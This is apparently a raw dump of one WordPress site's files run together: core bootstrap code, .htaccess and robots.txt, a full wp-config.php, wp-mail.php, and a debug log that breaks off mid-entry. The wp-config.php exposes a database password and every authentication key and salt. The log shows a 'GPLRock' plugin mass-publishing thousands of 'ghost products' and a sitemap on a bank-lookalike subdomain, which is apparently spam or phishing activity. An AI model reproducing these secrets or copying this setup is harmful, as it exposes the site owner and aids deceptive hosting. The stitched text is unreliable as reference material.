Load multisite-specific files. if ( is_multisite() ) { require ABSPATH . WPINC . '/ms-functions.php'; require ABSPATH . WPINC . '/ms-default-filters.php'; require ABSPATH . WPINC . '/ms-deprecated.php'; } // Define constants that rely on the API to obtain the default value. // Define must-use plugin directory constants, which may be overridden in the sunrise.php drop-in. wp_plugin_directory_constants(); /** * @since 3.9.0 * * @global array $wp_plugin_paths */ $GLOBALS['wp_plugin_paths'] = array(); // Load must-use plugins. foreach ( wp_get_mu_plugins() as $mu_plugin ) { $_wp_plugin_file = $mu_plugin; include_once $mu_plugin; $mu_plugin = $_wp_plugin_file; // Avoid stomping of the $mu_plugin variable in a plugin. /** * Fires once a single must-use plugin has loaded. * * @since 5.1.0 * * @param string $mu_plugin Full path to the plugin's main file. */ do_action( 'mu_plugin_loaded', $mu_plugin ); } unset( $mu_plugin, $_wp_plugin_file ); // Load network activated plugins. if ( is_multisite() ) { foreach ( wp_get_active_network_plugins() as $network_plugin ) { wp_register_plugin_realpath( $network_plugin ); $_wp_plugin_file = $network_plugin; include_once $network_plugin; $network_plugin = $_wp_plugin_file; // Avoid stomping of the $network_plugin variable in a plugin. /** * Fires once a single network-activated plugin has loaded. * * @since 5.1.0 * * @param string $network_plugin Full path to the plugin's main file. */ do_action( 'network_plugin_loaded', $network_plugin ); } unset( $network_plugin, $_wp_plugin_file ); } /** * Fires once all must-use and network-activated plugins have loaded. * * @since 2.8.0 */ do_action( 'muplugins_loaded' ); if ( is_multisite() ) { ms_cookie_constants(); } // Define constants after multisite is loaded. wp_cookie_constants(); // Define and enforce our SSL constants. wp_ssl_constants(); // Create common globals. require ABSPATH . WPINC . '/vars.php'; // Make taxonomies and posts available to plugins and themes. // @plugin authors: warning: these get registered again on the init hook. create_initial_taxonomies(); create_initial_post_types(); wp_start_scraping_edited_file_errors(); // Register the default theme directory root. register_theme_directory( get_theme_root() ); if ( ! is_multisite() && wp_is_fatal_error_handler_enabled() ) { // Handle users requesting a recovery mode link and initiating recovery mode. wp_recovery_mode()->initialize(); } // To make get_plugin_data() available in a way that's compatible with plugins also loading this file, see #62244. require_once ABSPATH . 'wp-admin/includes/plugin.php'; // Load active plugins. foreach ( wp_get_active_and_valid_plugins() as $plugin ) { wp_register_plugin_realpath( $plugin ); $plugin_data = get_plugin_data( $plugin, false, false ); $textdomain = $plugin_data['TextDomain']; if ( $textdomain ) { if ( $plugin_data['DomainPath'] ) { $GLOBALS['wp_textdomain_registry']->set_custom_path( $textdomain, dirname( $plugin ) . $plugin_data['DomainPath'] ); } else { $GLOBALS['wp_textdomain_registry']->set_custom_path( $textdomain, dirname( $plugin ) ); } } $_wp_plugin_file = $plugin; include_once $plugin; $plugin = $_wp_plugin_file; // Avoid stomping of the $plugin variable in a plugin. /** * Fires once a single activated plugin has loaded. * * @since 5.1.0 * * @param string $plugin Full path to the plugin's main file. */ do_action( 'plugin_loaded', $plugin ); } unset( $plugin, $_wp_plugin_file, $plugin_data, $textdomain ); // Load pluggable functions. require ABSPATH . WPINC . '/pluggable.php'; require ABSPATH . WPINC . '/pluggable-deprecated.php'; // Set internal encoding. wp_set_internal_encoding(); // Run wp_cache_postload() if object cache is enabled and the function exists. if ( WP_CACHE && function_exists( 'wp_cache_postload' ) ) { wp_cache_postload(); } /** * Fires once activated plugins have loaded. * * Pluggable functions are also available at this point in the loading order. * * @since 1.5.0 */ do_action( 'plugins_loaded' ); // Define constants which affect functionality if not already defined. wp_functionality_constants(); // Add magic quotes and set up $_REQUEST ( $_GET + $_POST ). wp_magic_quotes(); /** * Fires when comment cookies are sanitized. * * @since 2.0.11 */ do_action( 'sanitize_comment_cookies' ); /** * WordPress Query object * * @since 2.0.0 * * @global WP_Query $wp_the_query WordPress Query object. */ $GLOBALS['wp_the_query'] = new WP_Query(); /** * Holds the reference to {@see $wp_the_query}. * Use this global for WordPress queries * * @since 1.5.0 * * @global WP_Query $wp_query WordPress Query object. */ $GLOBALS['wp_query'] = $GLOBALS['wp_the_query']; /** * Holds the WordPress Rewrite object for creating pretty URLs * * @since 1.5.0 * * @global WP_Rewrite $wp_rewrite WordPress rewrite component. */ $GLOBALS['wp_rewrite'] = new WP_Rewrite(); /** * WordPress Object * * @since 2.0.0 * * @global WP $wp Current WordPress environment instance. */ $GLOBALS['wp'] = new WP(); /** * WordPress Widget Factory Object * * @since 2.8.0 * * @global WP_Widget_Factory $wp_widget_factory */ $GLOBALS['wp_widget_factory'] = new WP_Widget_Factory(); /** * WordPress User Roles * * @since 2.0.0 * * @global WP_Roles $wp_roles WordPress role management object. */ $GLOBALS['wp_roles'] = new WP_Roles(); /** * Fires before the theme is loaded. * * @since 2.6.0 */ do_action( 'setup_theme' ); // Define the template related constants and globals. wp_templating_constants(); wp_set_template_globals(); // Load the default text localization domain. load_default_textdomain(); $locale = get_locale(); $locale_file = WP_LANG_DIR . "/$locale.php"; if ( ( 0 === validate_file( $locale ) ) && is_readable( $locale_file ) ) { require $locale_file; } unset( $locale_file ); /** * WordPress Locale object for loading locale domain date and various strings. * * @since 2.1.0 * * @global WP_Locale $wp_locale WordPress date and time locale object. */ $GLOBALS['wp_locale'] = new WP_Locale(); /** * WordPress Locale Switcher object for switching locales. * * @since 4.7.0 * * @global WP_Locale_Switcher $wp_locale_switcher WordPress locale switcher object. */ $GLOBALS['wp_locale_switcher'] = new WP_Locale_Switcher(); $GLOBALS['wp_locale_switcher']->init(); // Load the functions for the active theme, for both parent and child theme if applicable. foreach ( wp_get_active_and_valid_themes() as $theme ) { $wp_theme = wp_get_theme( basename( $theme ) ); $wp_theme->load_textdomain(); if ( file_exists( $theme . '/functions.php' ) ) { include $theme . '/functions.php'; } } unset( $theme, $wp_theme ); /** * Fires after the theme is loaded. * * @since 3.0.0 */ do_action( 'after_setup_theme' ); // Create an instance of WP_Site_Health so that Cron events may fire. if ( ! class_exists( 'WP_Site_Health' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-site-health.php'; } WP_Site_Health::get_instance(); // Set up current user. $GLOBALS['wp']->init(); /** * Fires after WordPress has finished loading but before any headers are sent. * * Most of WP is loaded at this stage, and the user is authenticated. WP continues * to load on the {@see 'init'} hook that follows (e.g. widgets), and many plugins instantiate * themselves on it for all sorts of reasons (e.g. they need a user, a taxonomy, etc.). * * If you wish to plug an action once WP is loaded, use the {@see 'wp_loaded'} hook below. * * @since 1.5.0 */ do_action( 'init' ); // Check site status. if ( is_multisite() ) { $file = ms_site_check(); if ( true !== $file ) { require $file; die(); } unset( $file ); } /** * This hook is fired once WP, all plugins, and the theme are fully loaded and instantiated. * * Ajax requests should use wp-admin/admin-ajax.php. admin-ajax.php can handle requests for * users not logged in. * * @link https://developer.wordpress.org/plugins/javascript/ajax * * @since 3.0.0 */ do_action( 'wp_loaded' ); # BEGIN LSCACHE ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ## <IfModule mod_rewrite.c> RewriteEngine on RewriteRule litespeed/debug/.*\.log$ - [F,L] RewriteRule \.litespeed_conf\.dat - [F,L] </IfModule> <IfModule LiteSpeed> CacheLookup on RewriteRule .* - [E=Cache-Control:no-autoflush] ### marker ASYNC start ### RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php RewriteCond %{QUERY_STRING} action=async_litespeed RewriteRule .* - [E=noabort:1] ### marker ASYNC end ### ### marker DROPQS start ### CacheKeyModify -qs:fbclid CacheKeyModify -qs:gclid CacheKeyModify -qs:utm* CacheKeyModify -qs:_ga ### marker DROPQS end ### </IfModule> ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ## # END LSCACHE # BEGIN NON_LSCACHE ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ## ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ## # END NON_LSCACHE # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase /wp/ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /wp/index.php [L] </IfModule> # END WordPress # BEGIN LiteSpeed # The directives (lines) between "BEGIN LiteSpeed" and "END LiteSpeed" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule Litespeed> SetEnv noabort 1 </IfModule> # END LiteSpeedUser-agent: * Disallow: /wp-admin/ Allow: /wp-admin/admin-ajax.php Sitemap: https://colapatriamultibanca.com.subimicrotech.com/wp/archive-data.xml <?php define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'masterro_wp202' ); /** Database username */ define( 'DB_USER', 'masterro_wp202' ); /** Database password */ define( 'DB_PASSWORD', '@Y7SX40gp(' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'bowzch1a3yt2ptfav486zjx6tpsxor71fglpk9yceove8cymmp4vlbyvuk6fpdin' ); define( 'SECURE_AUTH_KEY', 'xabluhvngzf2go7wtut23ie8y2bysvvkwgwtwwj6bmiyvh6viqh9r68jmsykaoj6' ); define( 'LOGGED_IN_KEY', 'qec60q5yisbayd5ipniieng9vsvxvydkl3z1qvhhsmv6uwk5cbix71pd7kxui8p6' ); define( 'NONCE_KEY', 'qzlurscoyslrac7qphatxa3soxpobdnkcu94eyuvvk9f63ubsm0ouudbdj3thpai' ); define( 'AUTH_SALT', 'ojjhzg0ocmxpir1ignqnv6urnb0lp6sckz5kezvlwo3rc7wbakxc9suebnsjbwll' ); define( 'SECURE_AUTH_SALT', 'uatuf8e7xxx7zzf4j2vjrho1p8tp2eslpeipf2otp1ldjrnlg61vd9tyexpyi2gv' ); define( 'LOGGED_IN_SALT', 'g3pxu0dgddqctnyl47jlgxy3uuvirhto65zhlcoj31kbw0jwcaothbjqxwlpclge' ); define( 'NONCE_SALT', 'yd2cribfu0zhekgcqm38szfnwfidn9rddkzlpvvoinhjnftufwfrkvpebdgnwqss' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wpwf_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php /** * Gets the email message from the user's mailbox to add as * a WordPress post. Mailbox connection information must be * configured under Settings > Writing * * @package WordPress */ /** Make sure that the WordPress bootstrap has run before continuing. */ require __DIR__ . '/wp-load.php'; /** This filter is documented in wp-admin/options.php */ if ( ! apply_filters( 'enable_post_by_email_configuration', true ) ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } $mailserver_url = get_option( 'mailserver_url' ); if ( empty( $mailserver_url ) || 'mail.example.com' === $mailserver_url ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } /** * Fires to allow a plugin to do a complete takeover of Post by Email. * * @since 2.9.0 */ do_action( 'wp-mail.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** Get the POP3 class with which to access the mailbox. */ require_once ABSPATH . WPINC . '/class-pop3.php'; /** Only check at this interval for new messages. */ if ( ! defined( 'WP_MAIL_INTERVAL' ) ) { define( 'WP_MAIL_INTERVAL', 5 * MINUTE_IN_SECONDS ); } $last_checked = get_transient( 'mailserver_last_checked' ); if ( $last_checked ) { wp_die( sprintf( // translators: %s human readable rate limit. __( 'Email checks are rate limited to once every %s.' ), human_time_diff( time() - WP_MAIL_INTERVAL, time() ) ), __( 'Slow down, no need to check for new mails so often!' ), 429 ); } set_transient( 'mailserver_last_checked', true, WP_MAIL_INTERVAL ); $time_difference = (int) ( (float) get_option( 'gmt_offset' ) * HOUR_IN_SECONDS ); $phone_delim = '::'; $pop3 = new POP3(); if ( ! $pop3->connect( get_option( 'mailserver_url' ), get_option( 'mailserver_port' ) ) || ! $pop3->user( get_option( 'mailserver_login' ) ) ) { wp_die( esc_html( $pop3->ERROR ) ); } $count = $pop3->pass( get_option( 'mailserver_pass' ) ); if ( false === $count ) { wp_die( esc_html( $pop3->ERROR ) ); } if ( 0 === $count ) { $pop3->quit(); wp_die( __( 'There does not seem to be any new mail.' ) ); } // Always run as an unauthenticated user. wp_set_current_user( 0 ); for ( $i = 1; $i <= $count; $i++ ) { $message = $pop3->get( $i ); $bodysignal = false; $boundary = ''; $charset = ''; $content = ''; $content_type = ''; $content_transfer_encoding = ''; $post_author = 1; $author_found = false; $post_date = null; $post_date_gmt = null; foreach ( $message as $line ) { // Body signal. if ( strlen( $line ) < 3 ) { $bodysignal = true; } if ( $bodysignal ) { $content .= $line; } else { if ( preg_match( '/Content-Type: /i', $line ) ) { $content_type = trim( $line ); $content_type = substr( $content_type, 14, strlen( $content_type ) - 14 ); $content_type = explode( ';', $content_type ); if ( ! empty( $content_type[1] ) ) { $charset = explode( '=', $content_type[1] ); $charset = ( ! empty( $charset[1] ) ) ? trim( $charset[1] ) : ''; } $content_type = $content_type[0]; } if ( preg_match( '/Content-Transfer-Encoding: /i', $line ) ) { $content_transfer_encoding = trim( $line ); $content_transfer_encoding = substr( $content_transfer_encoding, 27, strlen( $content_transfer_encoding ) - 27 ); $content_transfer_encoding = explode( ';', $content_transfer_encoding ); $content_transfer_encoding = $content_transfer_encoding[0]; } if ( 'multipart/alternative' === $content_type && str_contains( $line, 'boundary="' ) && '' === $boundary ) { $boundary = trim( $line ); $boundary = explode( '"', $boundary ); $boundary = $boundary[1]; } if ( preg_match( '/Subject: /i', $line ) ) { $subject = trim( $line ); $subject = substr( $subject, 9, strlen( $subject ) - 9 ); // Captures any text in the subject before $phone_delim as the subject. if ( function_exists( 'iconv_mime_decode' ) ) { $subject = iconv_mime_decode( $subject, 2, get_option( 'blog_charset' ) ); } else { $subject = wp_iso_descrambler( $subject ); } $subject = explode( $phone_delim, $subject ); $subject = $subject[0]; } /* * Set the author using the email address (From or Reply-To, the last used) * otherwise use the site admin. */ if ( ! $author_found && preg_match( '/^(From|Reply-To): /', $line ) ) { if ( preg_match( '|[a-z0-9_.-]+@[a-z0-9_.-]+(?!.*<)|i', $line, $matches ) ) { $author = $matches[0]; } else { $author = trim( $line ); } $author = sanitize_email( $author ); if ( is_email( $author ) ) { $userdata = get_user_by( 'email', $author ); if ( ! empty( $userdata ) ) { $post_author = $userdata->ID; $author_found = true; } } } if ( preg_match( '/Date: /i', $line ) ) { // Of the form '20 Mar 2002 20:32:37 +0100'. $ddate = str_replace( 'Date: ', '', trim( $line ) ); // Remove parenthesized timezone string if it exists, as this confuses strtotime(). $ddate = preg_replace( '!\s*\(.+\)\s*$!', '', $ddate ); $ddate_timestamp = strtotime( $ddate ); $post_date = gmdate( 'Y-m-d H:i:s', $ddate_timestamp + $time_difference ); $post_date_gmt = gmdate( 'Y-m-d H:i:s', $ddate_timestamp ); } } } // Set $post_status based on $author_found and on author's publish_posts capability. if ( $author_found ) { $user = new WP_User( $post_author ); $post_status = ( $user->has_cap( 'publish_posts' ) ) ? 'publish' : 'pending'; } else { // Author not found in DB, set status to pending. Author already set to admin. $post_status = 'pending'; } $subject = trim( $subject ); if ( 'multipart/alternative' === $content_type ) { $content = explode( '--' . $boundary, $content ); $content = $content[2]; // Match case-insensitive Content-Transfer-Encoding. if ( preg_match( '/Content-Transfer-Encoding: quoted-printable/i', $content, $delim ) ) { $content = explode( $delim[0], $content ); $content = $content[1]; } $content = strip_tags( $content, '<img><p><br><i><b><u><em><strong><strike><font><span><div>' ); } $content = trim( $content ); /** * Filters the original content of the email. * * Give Post-By-Email extending plugins full access to the content, either * the raw content, or the content of the last quoted-printable section. * * @since 2.8.0 * * @param string $content The original email content. */ $content = apply_filters( 'wp_mail_original_content', $content ); if ( false !== stripos( $content_transfer_encoding, 'quoted-printable' ) ) { $content = quoted_printable_decode( $content ); } if ( function_exists( 'iconv' ) && ! empty( $charset ) ) { $content = iconv( $charset, get_option( 'blog_charset' ), $content ); } // Captures any text in the body after $phone_delim as the body. $content = explode( $phone_delim, $content ); $content = empty( $content[1] ) ? $content[0] : $content[1]; $content = trim( $content ); /** * Filters the content of the post submitted by email before saving. * * @since 1.2.0 * * @param string $content The email content. */ $post_content = apply_filters( 'phone_content', $content ); $post_title = xmlrpc_getposttitle( $content ); if ( '' === trim( $post_title ) ) { $post_title = $subject; } $post_category = array( get_option( 'default_email_category' ) ); $post_data = compact( 'post_content', 'post_title', 'post_date', 'post_date_gmt', 'post_author', 'post_category', 'post_status' ); $post_data = wp_slash( $post_data ); $post_ID = wp_insert_post( $post_data ); if ( is_wp_error( $post_ID ) ) { echo "\n" . $post_ID->get_error_message(); } // The post wasn't inserted or updated, for whatever reason. Better move forward to the next email. if ( empty( $post_ID ) ) { continue; } /** * Fires after a post submitted by email is published. * * @since 1.2.0 * * @param int $post_ID The post ID. */ do_action( 'publish_phone', $post_ID ); echo "\n<p><strong>" . __( 'Author:' ) . '</strong> ' . esc_html( $post_author ) . '</p>'; echo "\n<p><strong>" . __( 'Posted title:' ) . '</strong> ' . esc_html( $post_title ) . '</p>'; if ( ! $pop3->delete( $i ) ) { echo '<p>' . sprintf( /* translators: %s: POP3 error. */ __( 'Oops: %s' ), esc_html( $pop3->ERROR ) ) . '</p>'; $pop3->reset(); exit; } else { echo '<p>' . sprintf( /* translators: %s: The message ID. */ __( 'Mission complete. Message %s deleted.' ), '<strong>' . $i . '</strong>' ) . '</p>'; } } $pop3->quit(); [08-Mar-2026 17:53:47 UTC] WordPress database error Table 'masterro_wp202.wpwf_gplrock_logs' doesn't exist for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [08-Mar-2026 17:53:47 UTC] WordPress database error Table 'masterro_wp202.wpwf_gplrock_logs' doesn't exist for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [08-Mar-2026 17:53:48 UTC] GPLRock Sitemap: Registered with slug = archive-data [08-Mar-2026 17:53:48 UTC] GPLRock: Veritabanı tablosu başarıyla oluşturuldu: wpwf_gplrock_products [08-Mar-2026 17:53:49 UTC] GPLRock Sitemap: Registered with slug = archive-data [08-Mar-2026 17:53:49 UTC] GPLRock Sitemap Setup: COMPLETED with FORCED flush - slug = archive-data [08-Mar-2026 17:53:49 UTC] GPLRock Sitemap: Registered with slug = archive-data [08-Mar-2026 17:53:52 UTC] GPLRock Force Sync: API sync otomatik başlatıldı [08-Mar-2026 17:53:52 UTC] GPLRock API Sync: Batch başlıyor - Offset: 0, Total: 0/9737 [08-Mar-2026 17:53:53 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:53:53 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:53:53 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:53:53 UTC] GPLRock API Sync: Batch başlıyor - Offset: 100, Total: 100/9737 [08-Mar-2026 17:53:54 UTC] GPLRock: Image download failed for product bwd-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:53:54 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:53:54 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:53:56 UTC] GPLRock: Image download failed for product bwd-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:53:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-accordion-addon-for-elementor-2066.webp for product bwd-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:53:58 UTC] GPLRock: Image download failed for product bwd-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:00 UTC] GPLRock: Image download failed for product bwd-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-accordion-addon-for-elementor-2066.webp for product bwd-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:02 UTC] GPLRock WARNING: Image download failed for product bwd-accordion-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/bwd-accordion-addon-for-elementor-2066.webp [08-Mar-2026 17:54:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwd-accordion-addon-for-elementor [08-Mar-2026 17:54:02 UTC] GPLRock: Image download failed for product perfect-woocommerce-brands (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:04 UTC] GPLRock API Sync: Batch başlıyor - Offset: 300, Total: 300/9737 [08-Mar-2026 17:54:04 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:05 UTC] GPLRock: Image download failed for product perfect-woocommerce-brands (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:05 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:06 UTC] GPLRock API Sync: Batch başlıyor - Offset: 400, Total: 400/9737 [08-Mar-2026 17:54:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfect-woocommerce-brands-20053.webp for product perfect-woocommerce-brands after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:07 UTC] GPLRock: Image download failed for product perfect-woocommerce-brands (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:07 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:07 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:09 UTC] GPLRock: Image download failed for product perfect-woocommerce-brands (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfect-woocommerce-brands-20053.webp for product perfect-woocommerce-brands after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:11 UTC] GPLRock WARNING: Image download failed for product perfect-woocommerce-brands. URL: https://meldwp.com/wp-content/uploads/perfect-woocommerce-brands-20053.webp [08-Mar-2026 17:54:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: perfect-woocommerce-brands [08-Mar-2026 17:54:11 UTC] GPLRock: Image downloaded successfully for product weather-for-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2daebf9.webp [08-Mar-2026 17:54:11 UTC] GPLRock: Using pre-downloaded image for product weather-for-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2daebf9.webp [08-Mar-2026 17:54:11 UTC] GPLRock: Ghost product published with image - Product ID: weather-for-visual-composer [08-Mar-2026 17:54:11 UTC] GPLRock: Image downloaded successfully for product invoice-pdf-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13c13b4b.webp [08-Mar-2026 17:54:11 UTC] GPLRock: Using pre-downloaded image for product invoice-pdf-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13c13b4b.webp [08-Mar-2026 17:54:11 UTC] GPLRock: Ghost product published with image - Product ID: invoice-pdf-woocommerce [08-Mar-2026 17:54:11 UTC] GPLRock: Image download failed for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:13 UTC] GPLRock: Image download failed for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer-18659.webp for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:15 UTC] GPLRock: Image download failed for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:18 UTC] GPLRock: Image download failed for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer-18659.webp for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:20 UTC] GPLRock WARNING: Image download failed for product ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer-18659.webp [08-Mar-2026 17:54:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-bundle-two-for-wpbakery-page-builder-formerly-visual-composer [08-Mar-2026 17:54:20 UTC] GPLRock: Image download failed for product exa-navigator-fullscreen-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:22 UTC] GPLRock: Image download failed for product exa-navigator-fullscreen-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exa-navigator---fullscreen-menu-for-elementor-18465.webp for product exa-navigator-fullscreen-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:24 UTC] GPLRock: Image download failed for product exa-navigator-fullscreen-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:26 UTC] GPLRock: Image download failed for product exa-navigator-fullscreen-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exa-navigator---fullscreen-menu-for-elementor-18465.webp for product exa-navigator-fullscreen-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:28 UTC] GPLRock WARNING: Image download failed for product exa-navigator-fullscreen-menu-for-elementor. URL: https://meldwp.com/wp-content/uploads/exa-navigator---fullscreen-menu-for-elementor-18465.webp [08-Mar-2026 17:54:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exa-navigator-fullscreen-menu-for-elementor [08-Mar-2026 17:54:28 UTC] GPLRock: Image downloaded successfully for product atoz-seo-tools-search-engine-optimization-tools (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3b8061e.webp [08-Mar-2026 17:54:28 UTC] GPLRock: Using pre-downloaded image for product atoz-seo-tools-search-engine-optimization-tools: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3b8061e.webp [08-Mar-2026 17:54:28 UTC] GPLRock: Ghost product published with image - Product ID: atoz-seo-tools-search-engine-optimization-tools [08-Mar-2026 17:54:29 UTC] GPLRock: Image download failed for product gravity-forms-autocomplete-address-field (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:31 UTC] GPLRock: Image download failed for product gravity-forms-autocomplete-address-field (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 